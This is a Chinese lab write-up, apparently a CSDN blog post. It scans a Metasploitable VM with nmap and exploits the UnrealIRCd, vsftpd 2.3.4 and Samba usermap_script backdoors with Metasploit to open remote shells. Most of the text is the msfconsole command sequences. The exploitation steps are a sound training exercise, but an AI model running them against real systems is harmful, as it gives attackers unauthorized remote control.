2021-10-28 漏洞利用与远程控制

 一、实验题目:

        漏洞利用与远程控制
         


二、实验内容:

  1.使用nmap的【-A】参数对metasploitable进行强力扫描

  2.使用kali自带的msfconsole进行渗透测试与远程控制
           


三、环境准备:

  1.kali虚拟机(攻击者主机:192.168.112.130)

  2.Metasploitable靶机(目标主机:192.168.112.132)


四、实验步骤:

  1.使用ping命令测试连通性 

  2.打开终端,使用nmap的[-A]参数对metasploitable进行强力扫描

【命令】

nmap -A 192.168.112.132

   3.另外打开一个终端,对6667端口-irc_3281_backdoor 进行渗透复现

 【命令】

msfconsole                                                                      #打开msf控制台

search unreal_irc                                                            #搜索unreal_irc漏洞

use exploit/unix/irc/unreal_ircd_3281_backdoor      #使用unreal_ircd_3281_backdoor模块

show options                                                                   #显示模块所需参数

show payloads                                                                #显示payloads参数

set payload cmd/unix/bind_perl                                   #设置payload

set RHOSTS 192.168.112.132                                    #设置目标主机IP

exploit(或者run)                                                        #执行攻击

ifconfig                                                                             #查看目标主机IP

shell                                                                                 #打开目标主机终端

过程如下图:

  4.打开新的终端,对6200端口-vsftpd_234_backdoor进行渗透复现

【命令】

msfconsole                                                           #打开msf控制台

search vsftpd                                                        #搜索vsftpd漏洞

use exploit/unix/ftp/vsftpd_234_backdoor        #使用vsftpd_234_backdoor模块

show options                                                        #显示模块所需参数

set RHOSTS 192.168.112.132                          #设置目标主机IP

exploit(或者run)                                              #执行攻击

ifconfig                                                                   #查看目标主机IP

shell                                                                       #打开目标主机终端

 过程如下图:


  5.再次打开新的终端,对139端口--samba3.0漏洞进行渗透复现

【命令】

msfconsole                                            #打开msf控制台

search samba                                       #搜索samba漏洞

use multi/samba/usermap_script       #使用usermap_script模块

show options                                         #显示模块所需参数

set RHOSTS 192.168.112.132           #设置目标主机IP

exploit(或者run)                               #执行攻击

ifconfig                                                    #查看目标主机IP

shell                                                        #打开目标主机终端

过程如下图:

 

本文章供学习和参考!

欢迎各位感兴趣的小伙伴一起交流!

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值